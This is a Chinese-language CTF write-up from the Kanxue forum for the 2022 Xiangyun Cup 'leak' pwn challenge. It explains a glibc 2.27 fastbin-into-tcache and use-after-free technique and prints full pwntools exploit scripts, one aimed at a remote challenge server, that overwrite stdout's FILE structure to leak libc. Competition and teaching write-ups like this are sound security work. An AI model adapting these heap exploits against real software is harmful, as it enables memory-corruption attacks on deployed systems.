看雪论坛作者ID:xi@0ji233
一、文件分析
二、思路分析
fastbin reverse into tcache
fastbin->fd=tcache[size]->fd
fastbin->bk=&tcache[size]
tcache[size]->fd=fastbin
uaf的利用
def choice(ch):
    """Answer the 'Your choice: ' menu prompt with *ch*, sent as a decimal line."""
    selection = str(ch)
    p.sendlineafter(b'Your choice: ', selection)
def Index(index):
    """Answer the capitalised 'Index: ' prompt with *index* as a decimal line."""
    reply = str(index)
    p.sendlineafter(b'Index: ', reply)
def INDEX(index):
    """Answer the lower-case 'index: ' prompt (the one menu item 4 uses) with *index*."""
    reply = str(index)
    p.sendlineafter(b'index: ', reply)
def add(index, size):
    """Menu item 1: send slot *index*, then *size*, at their respective prompts."""
    choice(1)
    Index(index)
    size_text = str(size)
    p.sendlineafter(b'Size: ', size_text)
def edit(index, content):
    """Menu item 2: send slot *index*, then *content* after the 'Content: ' prompt.

    Uses sendafter (no trailing newline), so *content* goes out exactly as given.
    """
    choice(2)
    Index(index)
    p.sendafter(b'Content: ', content)
def de(index1, index2):
    """Menu item 4: send two slot indices at the lower-case 'index: ' prompt.

    Defined for completeness; no call to it is visible in the snippets.
    """
    choice(4)
    for slot in (index1, index2):
        INDEX(slot)
def free(index):
    """Menu item 3: send slot *index* at the 'Index: ' prompt."""
    choice(3)
    Index(index)
# Intermediate snippet from the writeup (the complete script is given under
# 最终exp further down).  Indentation was lost in extraction: the for-loop body
# is restored here as the four free/edit statements that follow it — confirm
# against the original post.
#
# NOTE(review): free(i) immediately followed by edit(i) writes into a slot the
# program has already released — the use-after-free the writeup's 'uaf的利用'
# section refers to.  On the target's side, nulling the slot pointer (and
# rejecting edits on empty slots) in the free path closes it.
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
    free(0)
    edit(0,p64(0))
    free(1)
    edit(1,p64(0))
free(0)
edit(0,p64(0))
free(1)
free(2)
# Intermediate snippet from the writeup (superseded by the 最终exp script
# below).  Indentation was lost in extraction: the for-loop body is restored as
# the four free/edit statements that follow it — confirm against the original
# post.
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
    free(0)
    edit(0,p64(0))
    free(1)
    edit(1,p64(0))
free(0)
edit(0,p64(0))
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
# A str literal is sent here while other calls pass bytes; it relies on the
# tube encoding the str byte-for-byte.
edit(5,'\x40')
# Intermediate snippet from the writeup (superseded by the 最终exp script
# below).  Indentation was lost in extraction: the for-loop body is restored as
# the four free/edit statements that follow it — confirm against the original
# post.
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
    free(0)
    edit(0,p64(0))
    free(1)
    edit(1,p64(0))
free(0)
edit(0,p64(0))
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
edit(5,'\x40')
add(6,0x20)
add(7,0x20)
edit(7,p64(0x6161616161616161)+p64(0x41))
free(1)
free(2)
edit(7,p64(0x65656565)+p64(0x61))
free(9)
free(2)
edit(7,p64(0x65656565)+p64(0xe1))
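# Intermediate snippet from the writeup (superseded by the 最终exp script
# below).  Indentation was lost in extraction: each for-loop body is restored
# as the four free/edit statements that follow it — confirm against the
# original post.  The last line was truncated in the page (its closing
# parenthesis was missing); it is completed here to match the same call in the
# complete script.
add(0,0x30)
add(1,0x30)
add(4,0x20)
add(2,0x30)
for i in range(3):
    free(0)
    edit(0,p64(0))
    free(1)
    edit(1,p64(0))
free(0)
edit(0,p64(0))
add(3,0x90)
add(5,0x20)
add(8,0xd0)
add(9,0x50)
free(4)
free(5)
edit(5,'\x40')
add(6,0x20)
add(7,0x20)
edit(7,p64(0x6161616161616161)+p64(0x41))
free(1)
free(2)
edit(7,p64(0x65656565)+p64(0x61))
free(9)
free(2)
edit(7,p64(0x65656565)+p64(0xe1))
for i in range(3):
    free(8)
    edit(8,p64(0))
    free(2)
    edit(2,p64(0))
free(8)
edit(8,p64(0))
free(2)
edit(7,p64(0x65656565)+p64(0x41)+b'\x60\xe7')
add(11,0x50)
add(10,0x50)
edit(10,p64(0xfbad1800)+p64(0)*4+p64(0x5fffffffffff))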
bk=&tcache[size]
最终exp
from pwn import *
# pwntools setup for the remote run: verbose tube logging, the challenge
# binary, and the libc the writeup pairs with it.
context.log_level='debug'
file='./leak'
elf=ELF(file)
libc=ELF('./libc/libc-2.27-64.so')
# Local launch is left commented out; pwn() below opens a remote tube instead.
#p=process(file)
def pwn():
    """Run one attempt against the remote service, then drop to interactive.

    The menu helpers are nested so they close over this attempt's tube ``p``;
    the retry loop below calls pwn() again on any exception.  Indentation was
    lost in extraction: each for-loop body is restored as the four free/edit
    statements that follow it — confirm against the original post.
    """
    p=remote('101.201.71.136', 20783)
    # NOTE(review): p is never closed; with the retry loop below, each failed
    # attempt leaks its socket until the process exits.
    def choice(ch):
        # Answer the menu prompt with ch as a decimal line.
        p.sendlineafter(b'Your choice: ',str(ch))
    def Index(index):
        # Capitalised 'Index: ' prompt.
        p.sendlineafter(b'Index: ',str(index))
    def INDEX(index):
        # Lower-case 'index: ' prompt, used by menu item 4.
        p.sendlineafter(b'index: ',str(index))
    def add(index,size):
        # Menu item 1: slot index, then size.
        choice(1)
        Index(index)
        p.sendlineafter(b'Size: ',str(size))
    def edit(index,content):
        # Menu item 2: slot index, then raw content (sendafter: no newline added).
        choice(2)
        Index(index)
        p.sendafter(b'Content: ',content)
    def de(index1,index2):
        # Menu item 4: two indices; not called in this script as far as visible.
        choice(4)
        INDEX(index1)
        INDEX(index2)
    def free(index):
        # Menu item 3: slot index.
        choice(3)
        Index(index)
    # NOTE(review): free(i) immediately followed by edit(i) writes into a slot
    # the program has already released — the use-after-free the writeup's
    # 'uaf的利用' section refers to.  On the target's side, nulling the slot
    # pointer (and rejecting edits on empty slots) in the free path closes it.
    add(0,0x30)
    add(1,0x30)
    add(4,0x20)
    add(2,0x30)
    for i in range(3):
        free(0)
        edit(0,p64(0))
        free(1)
        edit(1,p64(0))
    free(0)
    edit(0,p64(0))
    #free(1)
    #free(2)
    add(3,0x90)
    add(5,0x20)
    add(8,0xd0)
    add(9,0x50)
    free(4)
    free(5)
    # str literals ('\x40', '\x68\xe7') are mixed with bytes elsewhere; this
    # relies on the tube encoding them byte-for-byte.
    edit(5,'\x40')
    add(6,0x20)
    add(7,0x20)
    edit(7,p64(0x6161616161616161)+p64(0x41))
    free(1)
    free(2)
    edit(7,p64(0x65656565)+p64(0x61))
    free(9)
    free(2)
    edit(7,p64(0x65656565)+p64(0xe1))
    for i in range(3):
        free(8)
        edit(8,p64(0))
        free(2)
        edit(2,p64(0))
    free(8)
    edit(8,p64(0))
    free(2)
    edit(7,p64(0x65656565)+p64(0x41)+b'\x60\xe7')
    add(11,0x50)
    add(10,0x50)
    edit(10,p64(0xfbad1800)+p64(0)*4+p64(0x5fffffffffff))
    edit(2,'\x68\xe7')
    add(12,0x30)
    add(13,0x30)
    #gdb.attach(p)
    p.interactive()
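# Retry until one attempt runs through without raising.  The original used a
# bare `except:`, which also swallows KeyboardInterrupt and SystemExit and so
# makes the loop impossible to stop from the terminal; catching Exception keeps
# the retry-on-failure behaviour while leaving Ctrl-C working.
while True:
    try:
        pwn()
    except Exception:
        continue
    break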
三、比赛感想
from pwn import *
#context.log_level='debug'
# Local-process variant: this script runs the binary directly (and attaches
# gdb further down) rather than connecting to the remote service.
file='./leak'
elf=ELF(file)
libc=ELF('./libc/libc-2.27-64.so')
p=process(file)
def choice(ch):
    """Answer the 'Your choice: ' menu prompt with *ch*, sent as a decimal line."""
    selection = str(ch)
    p.sendlineafter(b'Your choice: ', selection)
def Index(index):
    """Answer the capitalised 'Index: ' prompt with *index* as a decimal line."""
    reply = str(index)
    p.sendlineafter(b'Index: ', reply)
def INDEX(index):
    """Answer the lower-case 'index: ' prompt (the one menu item 4 uses) with *index*."""
    reply = str(index)
    p.sendlineafter(b'index: ', reply)
def add(index, size):
    """Menu item 1: send slot *index*, then *size*, at their respective prompts."""
    choice(1)
    Index(index)
    size_text = str(size)
    p.sendlineafter(b'Size: ', size_text)
def edit(index, content):
    """Menu item 2: send slot *index*, then *content* after the 'Content: ' prompt.

    Uses sendafter (no trailing newline), so *content* goes out exactly as given.
    """
    choice(2)
    Index(index)
    p.sendafter(b'Content: ', content)
def de(index1, index2):
    """Menu item 4: send two slot indices at the lower-case 'index: ' prompt.

    Defined for completeness; no call to it is visible in this script.
    """
    choice(4)
    for slot in (index1, index2):
        INDEX(slot)
def free(index):
    """Menu item 3: send slot *index* at the 'Index: ' prompt."""
    choice(3)
    Index(index)
# Local-run script from the 比赛感想 section.  Indentation was lost in
# extraction: the for-loop body is restored as the four free/edit statements
# that follow it — confirm against the original post.
#
# NOTE(review): free(i) immediately followed by edit(i) writes into a slot the
# program has already released — the use-after-free the writeup's 'uaf的利用'
# section refers to.  On the target's side, nulling the slot pointer (and
# rejecting edits on empty slots) in the free path closes it.
add(7,0x20)
add(8,0x20)
add(9,0x90)
add(0,0x90)
add(1,0x10)
free(7)
free(8)
for i in range(3):
    free(0)
    edit(0,p64(0)*2)
    free(9)
    edit(9,p64(0)*2)
free(0)
#edit(0,p64(0)*2)
free(9)
# str literals ('\x00', '\xa0\xdc', '\x80\xe7') are mixed with bytes elsewhere;
# this relies on the tube encoding them byte-for-byte.
edit(0,'\x00')
#edit(0,'\x60\xe7')
add(2,0x90)
add(10,0x90)
# NOTE(review): gdb.attach is live here (not commented out as in the remote
# script); the run blocks at this point until a debugger attaches.
gdb.attach(p)
add(3,0x90)
edit(3,p64(0xfbad1800))
edit(0,'\xa0\xdc')
add(4,0x90)
free(4)
edit(4,p64(0))
free(0)
edit(0,'\x80\xe7')
add(5,0x90)
add(6,0x90)
edit(3,p64(0)*2+p64(0xfbad1800)+p64(0)*2+p64(0x31)*2+p64(0x5fffffffffff))
free(6)
edit(3,p64(0)*2+p64(0xfbad1800)+p64(0)*2+p64(0x31)+b'\x00')
# Menu item 6 is sent directly; no helper wraps it and the page does not show
# what the service does for it.
choice(6)
#flag=p.recvuntil('}')
#print(flag[-40:])
p.interactive()
看雪ID:xi@0ji233
https://bbs.pediy.com/user-home-919002.htm
看雪2022KCTF秋季赛官网:https://ctf.pediy.com/game-team_list-18-29.htm
原文始发于微信公众号(看雪学苑):祥云杯2022-leak Writeup